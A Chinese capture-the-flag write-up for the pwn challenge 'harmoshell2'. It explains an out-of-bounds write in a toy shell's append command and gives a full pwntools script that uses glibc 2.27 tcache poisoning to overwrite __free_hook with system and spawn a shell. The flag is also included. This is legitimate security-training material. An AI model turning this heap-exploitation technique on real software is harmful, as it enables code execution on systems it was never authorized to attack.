[Pwn] harmoshell2 - cpt.shao xp0int Posted on Apr 29 2021 逻辑和上一题类似,但是不再有栈溢出,而是`echo >` 和 `echo >>`功能存在越界,用`echo >`的时候会把off成员变量设置成写入内容大小,用`echo >>`的时候没有检查off+size是否越界,可以直接进行栈溢出。libc是2.27的版本,可以直接堆溢出进行tcache posion改写freehook为system。 注意这里没有aslr,用户态泄露的libc地址是`0x4000xxxxxx`开头的,前面0x4000泄露不出来,可以根据本地用户态启动确定,然后可以直接写死libc地址进行替换freehook操作。 ``` #flag{iNMLBaSM5KTAIIJLO0MV6XxiR8} from pwn import * import re context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' context.log_level = "debug" env = {'LD_PRELOAD': ''} if len(sys.argv) == 1: p = process('') elif len(sys.argv) == 3: p = remote(sys.argv[1], sys.argv[2]) se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) sea = lambda delim,data :p.sendafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr)) def touch(name): sla("$", "touch " + name) def echo(name, content): sla("$", "echo > %s" % (name)) time.sleep(0.1) se(content) time.sleep(0.1) def echo_append(name, content): sla("$", "echo >> %s" % (name)) se(content) def cat(name): sla("$", "cat %s" % name) def rm(name): sla("$", "rm %s" % name) for i in range(0x2): touch("a"*8) for i in range(2): rm("a"*8) # for i in range(2): # touch("b"*8) touch("b"*8) touch("c"*8) cat("b"*8) ru("Content: ") leak_heap = uu64(ru('\n')) info_addr("leak_heap", leak_heap) touch("d"*8) echo("c"*8, "C"*0x100) echo("d"*8, "D"*0x100) echo("b"*8, "B"*0x100) rm("c"*8) rm("d"*8) libc = 0x4000886000 #0x400088f000 free_hook = libc + 0x209838 system = libc + 0x1388fe strlen_got = 0x13038 fake = { 0: 0, 8: 0x31, 0x10:0, 0x18:0, 0x20:0, 0x28:0x100, 0x30:0x100, 0x38:0x111, 0x40:free_hook, 0x48:0 } echo_append("b"*8, flat(fake)) touch("e"*8) touch("f"*8) raw_input("here?") echo("f"*8, p64(system)) echo("e"*8, "/bin/sh\x00") rm("e"*8) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册